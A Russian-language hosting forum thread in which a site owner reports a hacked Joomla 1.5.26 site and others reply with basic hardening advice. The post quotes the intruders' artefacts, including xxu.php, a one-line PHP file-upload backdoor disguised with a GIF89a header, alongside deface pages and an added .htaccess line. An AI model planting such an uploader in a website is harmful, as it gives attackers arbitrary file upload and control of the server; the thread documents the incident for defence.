CMS Joomla. Был взломан сайт { Hackeado por HighTech Brazil HackTeam }

SSV88
9 лет
0

Сайт находится на Joomla 1.5.26

Сегодня зашёл на ftp и обнаружил в корне сайта файл: ck.htm с таким содержимым:
---------------------------------------
<b>Hackeado por HighTech Brazil HackTeam<br>No\One - CrazyDuck - Otrasher - L34NDR0</b>
---------------------------------------
Также судя по всему был изменён файл .htaccess, вверху добавлена строчка:
deny from 188.163.113.22

В папки cache и tmp были добавлены файлы index.php
---------------------------------------
<b>Hackeado por HighTech Brazil HackTeam<br>No\One - CrazyDuck - Otrasher - L34NDR0</b>
---------------------------------------

В папку images\stories\ файлы:
xxu.php
---------------------------------------
GIF89a u<?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>
---------------------------------------

xxx.php
---------------------------------------
Hackeado por HighTech Brazil HackTeam
No\One - CrazyDuck - Otrasher - L34NDR0
---------------------------------------

Слава Богу сайт работает и продолжает свою работу, так как если погуглить, то можно обнаружить огромное количество "лежащих" сайтов с ошибкой "Fatal error: Class 'JConfig' not found in /home/itghouse.com.ua/data/www/itghouse.com.ua/includes/framework.php on line 49"

Кто-нибудь ещё сталкивался с таким???

И какие есть соображения и рекомендации как обезопасить себя от будущего взлома?

SSV88
9 лет
0

Также проведя "Технический анализ сайта" показало один медленный запрос, которого до этого не было.
---------------------------
Время: 13.02.2013 00:14:19
Просканировано строк: 4380
Получено строк: 5
Продолжительность выполнения, сек: 00:00:17
Блокировка: 00:00:00
IP: 91.206.200.238

Текст запроса:

SELECT p.id AS id, p.catid, p.imgthumbname, p.imgfilename, p.imgtitle, p.imgdate AS imgdate, c.cid AS ccid, c.catpath AS catpath FROM jos_joomgallery AS p LEFT JOIN jos_joomgallery_catg AS c ON c.cid = p.catid WHERE c.published = 1 AND c.access <= 0 AND p.published = 1 AND p.approved = 1 AND c.hidden = 0 AND c.in_hidden = 0 AND p.hidden = 0 ORDER BY RAND() LIMIT 0, 5

Евгений В.
9 лет
0

Единственно верной в данном случае рекомендацией может быть ряд довольно банальных, если честно, вещей:
-- Все компоненты сайта должны быть обновлены и в актуальном состоянии;
-- Использовать минимум сторонних и плохо оттестированных компонентов и модулей - это потенциальные "дыры" в обороне;
-- Как это не банально - не пользоваться услугами любителей в плане создания тем оформления, модулей, плагинов, для "подгонки" сайта и пр. - это повышает риск возникновения подобных проблем;
-- Не использовать пароли слабее 8 знаков, имеющие смысл, не состоящие из букв верхнего и нижнего регистра и цифр;
-- Не выключать защиту FTP в соответствующем разделе панели управления;
Выполнять инструкции:
https://www.ukraine.com.ua/faq/rekome...
https://www.ukraine.com.ua/faq/kak-za...
https://www.ukraine.com.ua/faq/virusi...

million777
9 лет
0

1)Нужно ставить пароли хорошие.
2)Поставьте плагины защиты.
3)Не хранить пароли в coockie.
4)Защитить сам комп, если пароли на компе хранятся.
5)А так то сломать все можно)

million777
9 лет
0

Еще советую полностью копировать сайт и базу после обновления сайта, так, как все сторонние файлы сложно почистить, просто удалили все в фтп и заново залили без проблем + могли у вас просто ящик угнать мейл)

Тема закрыта.